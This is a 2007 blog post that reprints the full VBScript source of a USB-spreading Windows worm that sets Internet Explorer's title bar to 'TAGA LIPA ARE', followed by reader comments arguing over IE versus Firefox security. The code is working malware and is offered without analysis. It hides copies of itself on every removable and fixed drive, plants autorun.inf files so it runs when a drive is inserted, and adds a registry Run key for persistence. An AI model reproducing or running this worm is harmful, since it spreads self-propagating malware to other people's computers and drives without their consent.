iRant » Blog Archive » Bad Kung Fu

Bad Kung Fu

This is the source code for the “worm” that changes your IE’s title bar to “TAGA LIPA ARE”. How many people still use IE anyway?

'THIS IS A MODIFIED VERSION BY: F. E. SILVA

‘MABUHAY ANG LIPA

on error resume next

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd

atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe FS6519.dll.vbs”

set fs = createobject(”Scripting.FileSystemObject”)

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text=mf.openastextstream(1,-2)

do while not text.atendofstream

mysource=mysource&text.readline

source=mysource & vbcrlf

loop

do

Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & “\FS6519.dll.vbs”)

tf.attributes = 32

set tf=fs.createtextfile(winpath & “\FS6519.dll.vbs”,2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & “\FS6519.dll.vbs”)

tf.attributes = 39

for each flashdrive in fs.drives

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

set tf=fs.getfile(flashdrive.path &”\FS6519.dll.vbs”)

tf.attributes =32

set tf=fs.createtextfile(flashdrive.path &”\FS6519.dll.vbs”,2,true)

tf.write mysource

tf.close

set tf=fs.getfile(flashdrive.path &”\FS6519.dll.vbs”)

tf.attributes =39

set tf =fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)

tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes=39

end if

next

set rg = createobject(”WScript.Shell”)

rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519″,winpath&”\FS6519.dll.vbs”

rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”TAGA LIPA ARE!”

if check <> 1 then

Wscript.sleep 200000

end if

loop while check<>1

set sd = createobject(”Wscript.shell”)

sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

Source: PinoyPC

This entry was posted on Wednesday, April 11th, 2007 at 21.30.39 and is filed under Software/Code, Techitude, foo, bar and h4xx1ng. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Viewing 8 Comments

jploh 1 year ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

If I told you, I'd have to kill you.

reply edit reblog flag

http://blog.jploh.com

Alexis Pandaan 1 year ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

What is the source code of Baguio Strawberry virus?

reply edit reblog flag

jploh 1 year ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

You get to show only two? Not bad for Firefox. I can give you a long list of IE vulnerabilities. If include ActiveX holes, you wouldn't be able to digest it all. Compare the two pages

http://secunia.com/product/12434/?task=statistics
http://secunia.com/product/12366/?task=statistics

Where's the worm that I asked you to replicate? Can't make one?

reply edit reblog flag

http://blog.jploh.com

Anonymous Visitor 1 year ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

Check this out...

http://setiweb.ssl.berkeley.edu/beta/forum_thre...

http://www.virus.org/news/system-security/nasty...

reply edit reblog flag

jploh 1 year ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

Haha! Okay. May I suggest rereading this whole page and look for the part wher I said that Firefox is more secure than IE? You're overreacting.

On the other hand, it could be true (this post proves how easy it is to write a worm for IE/Windows). Can you write something like this for Firefox? Please, oh please do and prove yourself right.

reply edit reblog flag

http://blog.jploh.com

Anonymous Visitor 1 year ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

Oh really! As far as I know Microsoft Internet Explorer is far more secured compared to that of Mozilla... Mozilla Firefox's pop up blocker fails most of the time.

Just visit his link http://mywebpages.comcast.net/SupportCD/Firefox...

reply edit reblog flag

jploh 1 year ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

So true. Yung cafe nga sa Boracay walang Firefox e. Kaya tuwing uupo ako, kelangan ko pa magdownload. Where's portable apps when you need it?

reply edit reblog flag

http://blog.jploh.com

jupi 1 year ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

sad to say medyo marami parin gumagamit ng IE lalo na ung mga hinde masyado nagiinternet at di bihasa sa computer. gaya ng tita ko, kuya ni kai, pinsan ko, mga nakikita ko comp shop minsan, atbp. di kasi nila maintindihan mag download download pa, nahahassle ata sila sa ganon, tuturuan mo di gagawin :/, mas gusto nila nandun na wala ng gagawin pa which is IE.

reply edit reblog flag

http://blog.jupepot.com

blog comments powered by Disqus

Bad Kung Fu

Add New Comment

Viewing 8 Comments

Add New Comment